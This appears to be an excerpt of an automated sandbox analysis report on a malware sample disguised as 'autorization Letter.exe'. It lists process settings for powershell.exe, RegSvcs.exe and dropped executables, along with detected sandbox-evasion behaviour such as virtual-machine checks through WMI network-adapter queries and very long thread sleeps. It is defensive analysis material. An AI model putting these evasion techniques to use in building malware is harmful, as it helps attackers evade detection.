                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: autorization Letter.exe PID: 6180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: tIFjYTCo.exe PID: 3440, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 1670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 3420000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 3240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 7F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 8F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: 90C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: A0C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 6EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 7EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 8070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMemory allocated: 9070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 1150000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2C90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2AB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 2890000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMemory allocated: 4890000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\autorization Letter.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5301Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6687Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2307Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2751Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1091
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2786
                      Source: C:\Users\user\Desktop\autorization Letter.exe TID: 5084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep count: 5301 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep time: -3689348814741908s >= -30000sJump to behavior
